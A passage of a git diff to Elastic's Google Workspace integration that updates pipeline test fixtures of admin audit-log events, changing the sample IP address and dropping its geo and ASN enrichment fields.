"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_LOG_SEARCH\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_END_DATE\",\"value\":\"2020/07/28 04:59:59 UTC\"},{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"EMAIL_LOG_SEARCH_RECIPIENT\",\"value\":\"recipient\"},{\"name\":\"EMAIL_LOG_SEARCH_SENDER\",\"value\":\"sender\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_SENDER_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", + "ingested": "2021-12-09T13:38:42.563970900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_LOG_SEARCH\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_END_DATE\",\"value\":\"2020/07/28 04:59:59 UTC\"},{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"EMAIL_LOG_SEARCH_RECIPIENT\",\"value\":\"recipient\"},{\"name\":\"EMAIL_LOG_SEARCH_SENDER\",\"value\":\"sender\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_SENDER_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", "provider": "admin", "action": "EMAIL_LOG_SEARCH", "id": "1", @@ -178,7 +142,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770441300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_UNDELETE\",\"parameters\":[{\"name\":\"END_DATE\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", + "ingested": "2021-12-09T13:38:42.563976300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_UNDELETE\",\"parameters\":[{\"name\":\"END_DATE\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", "provider": "admin", "action": "EMAIL_UNDELETE", "end": "2002-10-02T12:00:00.000Z", @@ -257,7 +203,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -281,35 +227,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770443900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_EMAIL_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:42.563981600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_EMAIL_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_EMAIL_SETTING", "id": "1", @@ -340,7 +268,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -364,35 +292,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770445900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", + "ingested": "2021-12-09T13:38:42.563987Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "CHANGE_GMAIL_SETTING", "id": "1", @@ -423,7 +333,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -447,35 +357,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770447800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CREATE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", + "ingested": "2021-12-09T13:38:42.563991Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CREATE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "CREATE_GMAIL_SETTING", "id": "1", @@ -506,7 +398,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -530,35 +422,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770450300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DELETE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", + "ingested": "2021-12-09T13:38:42.563995300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DELETE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "DELETE_GMAIL_SETTING", "id": "1", @@ -589,7 +463,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -615,35 +489,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770453400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"REJECT_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", + "ingested": "2021-12-09T13:38:42.564000600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"REJECT_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "REJECT_FROM_QUARANTINE", "id": "1", @@ -673,7 +529,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -699,35 +555,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:22.770455600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"RELEASE_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", + "ingested": "2021-12-09T13:38:42.564005200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"RELEASE_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "RELEASE_FROM_QUARANTINE", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log index 2c60ded89cc..2df4744cd6e 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log @@ -1,14 +1,14 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CREATE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"DELETE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_DESCRIPTION","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_LIST_DOWNLOAD"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"ADD_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"REMOVE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBER_BULK_UPLOAD","parameters":[{"name":"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER","value":"0"},{"name":"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER","value":"10"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBERS_DOWNLOAD"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_NAME","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_SETTING","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"WHITELISTED_GROUPS_UPDATED","parameters":[{"name":"WHITELISTED_GROUPS","value":"a,b,c"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CREATE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"DELETE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_DESCRIPTION","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_LIST_DOWNLOAD"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"ADD_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"REMOVE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBER_BULK_UPLOAD","parameters":[{"name":"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER","value":"0"},{"name":"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER","value":"10"}]}} 